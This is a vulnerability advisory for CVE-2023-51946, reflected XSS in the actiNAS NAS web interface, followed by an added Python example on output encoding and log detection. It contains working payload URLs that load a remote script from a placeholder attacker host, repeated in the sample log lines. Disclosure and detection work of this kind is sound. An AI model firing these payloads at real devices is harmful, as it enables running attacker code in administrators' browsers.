CVE-2023-51946

Description

Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.

Affected systems

Version 3.2.03-SP1 of the web application shipped with the actiNAS Plus SL 2U-8 RDX.

Product link: https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx

Author

Eduard Agavriloae

Details

The web application's /nasSvr.php endpoint is prone to reflected XSS through two query parameters, func and op. A payload injected into either parameter is reflected unencoded into the response and rendered on the client inside an error message; which message is used depends on the parameter:

  • Option <payload> not match in Account Manager!
  • func:<payload> not match in nasSvr!

If the payload contains string delimiters such as ' or " with whitespace between them, the web application modifies it by inserting string delimiters before and after the whitespace, which breaks the payload's execution. This is only a partial filter, not output encoding: it can be bypassed by injecting a script tag with an arbitrary src attribute, which executes attacker-controlled JavaScript without restriction, or simply by using payloads that have no whitespace between string delimiters.

Example payloads:

  • /nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
  • /nasSvr.php?func=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
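The following Python example is added here and is not part of the advisory or of the vendor's code. It models the two reflected messages quoted above, contrasts raw reflection (an assumed model of the vulnerable behaviour, since nasSvr.php's source is not shown) with HTML-entity encoding of the reflected value, and runs a small detector over constructed access-log lines that carry the request shapes from the example payloads. The IP addresses, timestamps and the example.invalid host are constructed placeholders.

```python
"""Added example, not part of the CVE-2023-51946 advisory.

Models the two reflected error messages the advisory quotes for
/nasSvr.php, contrasts raw reflection with HTML-entity encoding, and
runs a small detector over constructed access-log lines. The message
templates are taken from the advisory; render_unsafe() is an assumed
model of the vulnerable behaviour, not the product's own code.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Message templates quoted in the advisory, keyed by the reflected parameter.
MESSAGE_TEMPLATES = {
    "op": "Option {value} not match in Account Manager!",
    "func": "func:{value} not match in nasSvr!",
}


def render_unsafe(param: str, value: str) -> str:
    """Assumed model of the vulnerable behaviour: the raw value is reflected."""
    return MESSAGE_TEMPLATES[param].format(value=value)


def render_safe(param: str, value: str) -> str:
    """Hardened form: HTML-entity encode the value before it enters the page.

    html.escape(..., quote=True) encodes & < > " and ', so neither a tag nor
    an attribute breakout survives in an HTML text context.
    """
    return MESSAGE_TEMPLATES[param].format(value=html.escape(value, quote=True))


# A decoded value that still contains the start of an HTML tag.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def contains_markup(fragment: str) -> bool:
    return TAG_RE.search(fragment) is not None


def reflected_params(request_target: str) -> dict:
    """Return the URL-decoded func/op values from a request path plus query."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items() if k in MESSAGE_TEMPLATES}


# Constructed sample access-log lines (Common Log Format); the IPs and the
# example.invalid host are placeholders, not observed data.
LOG_LINES = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /nasSvr.php?func=accountMgr&op=list HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://example.invalid/p.js%3E%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /nasSvr.php?func=%3Cscript%20src=https://example.invalid/p.js%3E%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

# client ip, method, request target; the rest of the line is not needed here.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')


def suspicious_requests(lines) -> list:
    """(client_ip, parameter) for nasSvr.php requests whose reflected
    parameter decodes to something containing an HTML tag."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client_ip, target = m.group(1), m.group(3)
        if urlsplit(target).path != "/nasSvr.php":
            continue
        for param, value in reflected_params(target).items():
            if contains_markup(value):
                hits.append((client_ip, param))
    return hits


if __name__ == "__main__":
    probe = "<script src=https://example.invalid/p.js></script>"
    print(render_unsafe("op", probe))
    print(render_safe("op", probe))
    print(suspicious_requests(LOG_LINES))
```

The point of render_safe is that the fix is context-aware output encoding of everything reflected into the page, which in PHP is htmlspecialchars($value, ENT_QUOTES, 'UTF-8') for an HTML text context; the delimiter-mangling the advisory describes is not a substitute. The detector is a log-review heuristic only: it decodes one layer of percent-encoding and looks for a tag start, so double-encoded or otherwise obfuscated input will not be flagged by it.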

Other versions

My feeling is that other versions are affected as well, but I didn't find other instances of this product in order to validate.